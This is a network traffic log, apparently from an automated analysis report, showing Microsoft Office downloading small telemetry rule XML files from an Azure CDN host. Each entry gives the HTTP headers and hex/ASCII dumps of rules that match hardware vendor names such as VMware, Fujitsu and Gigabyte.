                                  2024-11-25 23:29:18 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  37192.168.2.44978613.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:17 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:18 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:17 GMT
                                  Content-Type: text/xml
                                  Content-Length: 477
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                  ETag: "0x8DC582BB8CEAC16"
                                  x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232917Z-174f78459685m244hC1EWRgp2c0000000ucg0000000008rs
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:18 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  38192.168.2.44978813.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:17 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:18 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:18 GMT
                                  Content-Type: text/xml
                                  Content-Length: 494
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                  ETag: "0x8DC582BB7010D66"
                                  x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232918Z-174f7845968psccphC1EWRuz9s0000000uy00000000006yq
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:18 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  39192.168.2.44978913.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:19 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:20 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:20 GMT
                                  Content-Type: text/xml
                                  Content-Length: 419
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                  ETag: "0x8DC582B9748630E"
                                  x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232920Z-174f784596886s2bhC1EWR743w0000000upg0000000006ue
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:20 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  40192.168.2.44978713.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:19 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:20 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:20 GMT
                                  Content-Type: text/xml
                                  Content-Length: 464
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                  ETag: "0x8DC582B97FB6C3C"
                                  x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232920Z-174f7845968xlwnmhC1EWR0sv80000000ucg0000000009zm
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:20 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  41192.168.2.44979113.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:19 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:20 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:20 GMT
                                  Content-Type: text/xml
                                  Content-Length: 404
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                  ETag: "0x8DC582B9E8EE0F3"
                                  x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232920Z-174f7845968l4kp6hC1EWRe8840000000uw000000000089y
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:20 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  42192.168.2.44979013.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:19 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:20 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:20 GMT
                                  Content-Type: text/xml
                                  Content-Length: 472
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                  ETag: "0x8DC582B9DACDF62"
                                  x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232920Z-174f7845968glpgnhC1EWR7uec0000000uw0000000000760
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:20 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  43192.168.2.44979213.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:20 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:20 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:20 GMT
                                  Content-Type: text/xml
                                  Content-Length: 468
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                  ETag: "0x8DC582B9C8E04C8"
                                  x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232920Z-174f7845968cdxdrhC1EWRg0en0000000uf00000000009s2
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:20 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  44192.168.2.44979313.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:22 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:23 UTC470INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:22 GMT
                                  Content-Type: text/xml
                                  Content-Length: 499
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                  ETag: "0x8DC582B98CEC9F6"
                                  x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232922Z-174f7845968cdxdrhC1EWRg0en0000000ug0000000000d23
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:23 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  45192.168.2.44979413.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:22 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:23 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:22 GMT
                                  Content-Type: text/xml
                                  Content-Length: 428
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                  ETag: "0x8DC582BAC4F34CA"
                                  x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232922Z-174f7845968glpgnhC1EWR7uec0000000uv00000000006uu
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:23 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  46192.168.2.44979513.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:22 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:23 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:23 GMT
                                  Content-Type: text/xml
                                  Content-Length: 471
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                  ETag: "0x8DC582BB5815C4C"
                                  x-ms-request-id: 6c824192-201e-0051-0a91-3f7340000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232923Z-174f7845968glpgnhC1EWR7uec0000000ung000000000bku
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
                                  2024-11-25 23:29:23 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  47192.168.2.44979713.107.246.63443
                                  TimestampBytes transferredDirectionData
                                  2024-11-25 23:29:22 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-25 23:29:23 UTC491INHTTP/1.1 200 OK
                                  Date: Mon, 25 Nov 2024 23:29:23 GMT
                                  Content-Type: text/xml
                                  Content-Length: 419
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                  ETag: "0x8DC582BB32BB5CB"
                                  x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241125T232923Z-174f7845968ljs8phC1EWRe6en0000000uc0000000000875
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  X-Cache-Info: L1_T2
                                  Accept-Ranges: bytes
